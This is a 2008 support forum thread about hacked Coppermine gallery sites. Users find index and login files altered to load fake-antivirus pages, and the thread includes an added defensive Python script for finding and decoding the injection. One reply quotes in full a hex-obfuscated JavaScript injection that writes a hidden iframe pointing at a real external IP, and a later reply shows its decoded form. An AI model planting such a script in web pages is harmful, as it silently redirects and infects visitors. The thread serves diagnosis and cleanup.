Topic: 1.4.18 (Stable) SQL Injection issue. (I think)

adam1942 (Coppermine newbie, Posts: 6)
« on: June 11, 2008, 11:45:36 pm »

Folks,

I installed version 1.4.14 of Coppermine through Fantastico, then upgraded straight away (within 5 minutes) of using 1.4.14. The gallery has been known to the public for about 1 day / 1 and a half days and I've already had an SQL injection (I think) which is loading crap from advancedxpdefender.xxxxx. Has anyone else had this? I cannot find how to remove it as I cannot find anything in the SQL database linking to advancedxpdefender. Are there any specific files I should be checking on the FTP?

Adam.

adam1942
« Reply #1 on: June 11, 2008, 11:46:43 pm »

Er, that's supposed to say I upgraded to 1.4.18, sorry!

Nibbler (Guest)
« Reply #2 on: June 11, 2008, 11:49:36 pm »

Check for any files modified since you made the update. If you just installed then you can just upload clean copies of all the files. What makes you think it's SQL injection? Do you have a log file that indicates this?

adam1942
« Reply #3 on: June 11, 2008, 11:52:07 pm »

Nope, but no one else has access to the FTP to access any file... all perms should be set right. I had an SQL injection before on a forum and it loaded exactly the same way, which is what's making me think it's a SQL injection. I will check for files that are modded and get back to you.

adam1942
« Reply #4 on: June 11, 2008, 11:58:16 pm »

OK fella, found out that index.php and login.php had been edited today. The worrying thing is that NO one has access to the FTP and the password is numbers/letters and characters. Any ideas?

adam1942
« Reply #5 on: June 11, 2008, 11:58:52 pm »

I've also taken a backup of them if you wish to see the infected/modified file.

adam1942
« Reply #6 on: June 12, 2008, 01:01:31 am »

Just found out every index.php/index.html/login.php has been changed on my server. This is webhosting so I think maybe the whole box was attacked! Ooops :(

wurst (Coppermine newbie, Posts: 2)
« Reply #7 on: June 13, 2008, 12:52:14 am »

I was looking for this curious incident and so I found this page. I think it has nothing to do especially with Coppermine. I design a few pages on different hosters and I have exactly this situation: a lot of (not every) index.php/html/htm files have this JavaScript tag:

Code:
<script>
<!--
var d=document,kol=561;
function O10H4851354BB6EB1(H4851354BB76AA){ var H4851354BB7EAB = 16; return( parseInt(H4851354BB76AA,H4851354BB7EAB));}function H4851354BB8E94(H4851354BB968D){ var H4851354BBAE91 = 2; var H4851354BB9E9A='';for(H4851354BBA67D=0; H4851354BBA67D<H4851354BB968D.length; H4851354BBA67D+=H4851354BBAE91){ H4851354BB9E9A += ( String.fromCharCode (O10H4851354BB6EB1(H4851354BB968D.substr(H4851354BBA67D, H4851354BBAE91))));}return H4851354BB9E9A;} document.write(H4851354BB8E94('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3130373031292B27353937375C272077696474683D323631206865696768743D3431207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>

My suspicion is that I had installed a worm or eventually an injection software on my local PC, that read all my FTP logins and wrote this JavaScript tag to all index files!
I saw in the status bar of my browser that advancedxpdefender.com and 77.221.133.198 (Russia) were loading. When I left the page or closed the window, a popup appeared with a warning that my PC isn't protected and I should go to advancedxp; no, I don't write this f...... domain name anymore.

Now I reinstalled my OS and it seems to work as well...

SaWey (Dev Team member, Coppermine addict, Posts: 1119, SaWey.be)
« Reply #8 on: June 13, 2008, 01:18:06 am »

Yes, this code, when evaluated, looks like this:
Code:
<SCRIPT>
window.status='Done';
document.write('<iframe name=[random_nr] src=\'http://77.221.X.X/.if/go.html?'+Math.round(Math.random()*[random_nr])+'[random_nr]\'width=303 height=93  style=\'display: none\'></iframe>')
</SCRIPT>
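Added example (not code from this thread, from Coppermine, or from any poster): a triage script that does, from the defender's side, what Nibbler's reply and SaWey's decoding above describe. It walks a web root for the file names reported in the thread (index.php, index.html, index.htm, login.php), flags those modified after a reference time or carrying the `document.write(<generated name>('<hex>'))` pattern from wurst's post, decodes the hex payload the same way SaWey did (two hex digits per character, via parseInt(pair, 16) in the original) without evaluating any JavaScript, and pulls the hidden IFRAME src out of the result so it can be blocked or searched for in other files. It generalises slightly beyond the sample: the generated function name is matched by shape, not by the literal H4851354BB8E94. The hex string is the one quoted in wurst's post; the sample files, directory layout and reference timestamp are constructed for the demonstration.

```python
"""Triage helper for hex-obfuscated script injections in index/login files.
Added example; sample files and timestamps below are constructed."""
import os
import re
import tempfile
from datetime import datetime, timezone

# Injected call shape: document.write(<generatedName>('<even-length hex>'))
INJECTED_RE = re.compile(
    r"document\.write\(\s*[A-Za-z_$][\w$]*\(\s*'([0-9A-Fa-f]{8,})'\s*\)\s*\)"
)
# Hidden frame written by the decoded payload: <IFRAME ... src=\'...\'
IFRAME_SRC_RE = re.compile(r"<IFRAME[^>]*src=\\?'([^'\\]+)", re.IGNORECASE)

TARGET_NAMES = {"index.php", "index.html", "index.htm", "login.php"}
REFERENCE_TIME = datetime(2008, 6, 11, tzinfo=timezone.utc)  # constructed

# Hex payload as quoted in the thread (split only for readability).
SAMPLE_HEX = (
    "3C7363726970743E696628216D796961297B642E777269746528273C494652414D45"
    "206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E313731"
    "2F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D2829"
    "2A3130373031292B27353937375C272077696474683D323631206865696768743D3431"
    "207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E"
    "27293B7D766172206D7969613D747275653B3C2F7363726970743E"
)
# Constructed injected index.php: wrapper from the thread, decoder body elided.
INJECTED_SAMPLE = (
    "<html><body>Gallery</body></html>\n"
    "<script>\n<!--\nvar d=document,kol=561;\n"
    "function H4851354BB8E94(s){ /* hex pairs -> chars */ }"
    " document.write(H4851354BB8E94('" + SAMPLE_HEX + "'));\n"
    "//-->\n</script>\n"
)
CLEAN_SAMPLE = "<html><body>Gallery</body></html>\n"


def decode_hex_payload(hexstr):
    """Two hex digits -> one character, as the obfuscator's decoder does."""
    if len(hexstr) % 2:
        raise ValueError("odd-length hex payload")
    return bytes.fromhex(hexstr).decode("latin-1")


def extract_iframe_src(decoded):
    """Return the hidden IFRAME src from a decoded payload, or None."""
    m = IFRAME_SRC_RE.search(decoded)
    return m.group(1) if m else None


def analyse_file(path):
    """List (hex, decoded, iframe_src) for every injected call in the file."""
    with open(path, "r", encoding="latin-1", errors="replace") as f:
        text = f.read()
    results = []
    for m in INJECTED_RE.finditer(text):
        hexstr = m.group(1)
        try:
            decoded = decode_hex_payload(hexstr)
        except ValueError:
            continue
        results.append((hexstr, decoded, extract_iframe_src(decoded)))
    return results


def find_suspects(webroot, since):
    """Target-named files modified after `since` or carrying the injection.
    Returns a sorted list of (relative path, comma-joined reasons)."""
    found = []
    since_ts = since.timestamp()
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            if name.lower() not in TARGET_NAMES:
                continue
            p = os.path.join(dirpath, name)
            reasons = []
            if os.path.getmtime(p) > since_ts:
                reasons.append("modified-after-reference")
            if analyse_file(p):
                reasons.append("injected-script")
            if reasons:
                found.append((os.path.relpath(p, webroot), ",".join(reasons)))
    return sorted(found)


def build_demo_webroot():
    """Throwaway web root: one clean index.html dated before REFERENCE_TIME
    and one injected gallery/index.php written now. Returns the root path."""
    root = tempfile.mkdtemp(prefix="cpg_triage_")
    clean = os.path.join(root, "index.html")
    with open(clean, "w") as f:
        f.write(CLEAN_SAMPLE)
    old = REFERENCE_TIME.timestamp() - 86400
    os.utime(clean, (old, old))
    os.makedirs(os.path.join(root, "gallery"))
    with open(os.path.join(root, "gallery", "index.php"), "w") as f:
        f.write(INJECTED_SAMPLE)
    return root


if __name__ == "__main__":
    root = build_demo_webroot()
    for rel, why in find_suspects(root, REFERENCE_TIME):
        print(rel, why)
        for _, decoded, src in analyse_file(os.path.join(root, rel)):
            print("  decoded:", decoded)
            print("  hidden frame src:", src)
```

Run against a real web root, replace `build_demo_webroot()` with the gallery directory and set `REFERENCE_TIME` to the time of the last known-good upload; the decoded payload is only ever treated as text, so nothing in the injected file is executed during the scan.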

Joachim Müller aka "GauGau" (Dev Team member, Coppermine addict, Posts: 47843, gaugau.de)
« Reply #9 on: June 13, 2008, 08:07:07 am »

Not a case of SQL injection though, as far as I can tell. Seems like you have fallen victim to a similar hack as the one discussed in http://forum.coppermine-gallery.net/index.php/topic,51671.0.html
A copycat may have changed the workload of the hack, but probably is using the same attack pattern. Therefore, do as suggested in http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

wurst
« Reply #10 on: June 13, 2008, 12:49:20 pm »

I recommend changing ALL your passwords from a clean machine. I changed all but one FTP account, and this one continues to be attacked with said JavaScript code. So the attacks don't come from the one machine but from outside. My hoster said that FTP actions came from 77.221.....